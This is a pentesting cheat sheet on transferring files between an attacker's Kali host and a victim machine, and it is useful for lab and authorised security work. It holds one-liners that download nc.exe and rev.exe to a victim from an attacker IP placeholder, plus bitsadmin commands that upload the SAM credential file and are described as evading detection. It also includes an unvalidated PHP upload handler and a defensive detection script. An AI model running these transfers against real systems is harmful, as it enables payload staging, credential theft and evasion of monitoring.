Cheat sheet for transferring (downloading/uploading) files between machines.
On Windows, C:\ProgramData is often writable.
Web server
Use updog, a replacement for SimpleHTTPServer that allows upload!
# Python 2.7
python -m SimpleHTTPServer 80
# Python 3.x
python3 -m http.server 80
sudo service apache2 start
Transfer binary files (convert to ascii)
Optional: Compress binary file
Use an executable packer (PE compression tool). The file is still executable after!
cd /home/kali/share
upx -9 nc.exe
Convert binary file to ascii
exe2hex -x nc.exe -p nc.cmd
Transfer the file using any other method.
Reconstruct the binary file
The last command in nc.cmd is PowerShell and reconstructs the binary file.
.\nc.cmd
FTP
pip install pyftpdlib
python -m pyftpdlib -p 21 -w
ftp anonymous@x.x.x.x
wget
Proxy configuration
nano /etc/wgetrc
http_proxy = http://127.0.0.1:3128
use_proxy = on
Download file in current directory
wget -O <local file name> <URL>
wget -O /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"
Download folder
wget -r "https://whatever/foldernameendingwithaslash/"
curl
curl -o <local file name> <URL>
curl -o /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"
axel
Download accelerator.
axel -a -n 20 -o <local file name> <URL>
axel -a -n 20 -o /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"
netcat
See Netcat.
Powershell
See Powershell Cheat Sheet for more examples.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://IP/rev.exe','C:\ProgramData\rev.exe')"
scp (secure copy)
scp [OPTION] [[user@]SRC_HOST:]file1 [[user@]DEST_HOST:]file2
sudo service ssh start
Windows (victim) to Kali
scp -r "C:\path\file.txt" kali@x.x.x.x:/home/kali/
Linux (victim) to Kali
scp -r "/tmp/linpeas.txt" kali@x.x.x.x:/home/kali/
Background Intelligent Transfer Service (BITS) on Windows
Useful to evade detection since BITS is used for Windows Updates.
Download file
bitsadmin /create JOB & bitsadmin /addfile JOB <REMOTE_SRC> <LOCAL_DST> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
bitsadmin /create JOB & bitsadmin /addfile JOB http://<KALI IP>/nc.exe %TEMP%\Data\nc.exe & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
Upload file
bitsadmin /create /upload JOB & bitsadmin /addfile JOB <REMOTE_DST> <LOCAL_SRC> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
bitsadmin /create /upload JOB & bitsadmin /addfile JOB http://<KALI IP>/SAM %TEMP%\Data\SAM & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
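A defender's view of the bitsadmin and WebClient one-liners on this page, as an added example that is not part of the original cheat sheet: a small Python matcher run over process-creation command lines. The rule names, the sample lines and the C:\Windows\Temp entry are constructed assumptions.

```python
import re

# Rules mirror the one-liners on this page; they are matched against
# process-creation command lines (Security 4688 or Sysmon event ID 1).
RULES = [
    ("bits_addfile_url", re.compile(
        r"\bbitsadmin(?:\.exe)?\s+/addfile\s+\S+\s+(?P<url>https?://\S+)\s+(?P<path>\S+)", re.I)),
    ("bits_upload_job", re.compile(
        r"\bbitsadmin(?:\.exe)?\s+/create\s+/upload\b", re.I)),
    ("ps_webclient_transfer", re.compile(
        r"Net\.WebClient\)?\.(?:Download|Upload)File\(\s*'(?P<url>[^']+)'\s*,\s*'(?P<path>[^']+)'", re.I)),
]
# User-writable locations named on this page, plus Windows\Temp (assumption).
STAGING = re.compile(r"^(?:[a-z]:\\programdata\\|%temp%\\|[a-z]:\\windows\\temp\\)", re.I)


def scan(command_line):
    """Return one finding per rule hit in a logged command line."""
    findings = []
    # cmd.exe chains commands with '&', so test every segment separately.
    for segment in re.split(r"\s*&+\s*", command_line):
        for name, pattern in RULES:
            match = pattern.search(segment)
            if match:
                finding = {"rule": name, **match.groupdict()}
                # Flag local paths that sit in a commonly writable directory.
                finding["staging_dir"] = bool(STAGING.match(finding.get("path", "")))
                findings.append(finding)
    return findings


# Constructed sample command lines (192.0.2.10 is a documentation address).
SAMPLE_LOG = [
    r'cmd.exe /c "bitsadmin /create JOB & bitsadmin /addfile JOB http://192.0.2.10/tool.exe %TEMP%\Data\tool.exe & bitsadmin /resume JOB"',
    r'''powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.0.2.10/a.exe','C:\ProgramData\a.exe')"''',
    r"bitsadmin /create /upload JOB2",
    r"bitsadmin /list /allusers",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for hit in scan(line):
            print(hit)
```

The transfer itself is performed by the BITS service, so the job-creating command line is where the remote URL and local path appear together.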
Impacket
See Impacket.
- Start SMB server on Kali Linux. See this post.
- On the Windows machine, copy file from Kali
Supports binary file transfer. SEE ALSO impacket-wmiexec!!
On Kali
sudo impacket-smbserver myshare /home/kali/share
On Windows
net view \\<KALI IP>
dir \\<KALI IP>\<sharename>
copy <source> <destination>
copy <filename> \\<KALI IP>\<sharename>\<filename>
copy \\<KALI IP>\<sharename>\<filename> <filename>
PHP File Upload
On Kali, host a file upload page on Apache Web Server.
sudo mkdir /var/www/html/uploads
sudo chown www-data:www-data /var/www/html/uploads
sudo chmod 766 /var/www/html/uploads
sudo service apache2 start
upload.php
sudo nano /var/www/html/upload.php
<?php
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["targetfile"]["name"]);
move_uploaded_file($_FILES["targetfile"]["tmp_name"], $target_file);
?>
upload.html
sudo nano /var/www/html/upload.html
<html>
<head></head>
<body>
<form action="./upload.php" method="POST" enctype="multipart/form-data">
File<br>
<input type="file" name="targetfile"><br>
<input type="submit" name="submit" value="upload">
</form>
</body>
</html>
On the victim
Open a web browser and go to http://<KALI_IP>/upload.html
powershell (New-Object System.Net.WebClient).UploadFile('http://x.x.x.x/upload.php', 'file.txt')
WinSCP
WinSCP (Windows Secure Copy) is a file manager, SSH File Transfer Protocol (SFTP), File Transfer Protocol (FTP), WebDAV, Amazon S3, and secure copy protocol (SCP) client for Microsoft Windows.
Download and install WinSCP.
Authentication with RSA private key
- On the Login screen, click on Advanced.
- Click on SSH->Authentication.
- Select the private key file (PuTTY format, “.ppk” file).
- Click OK.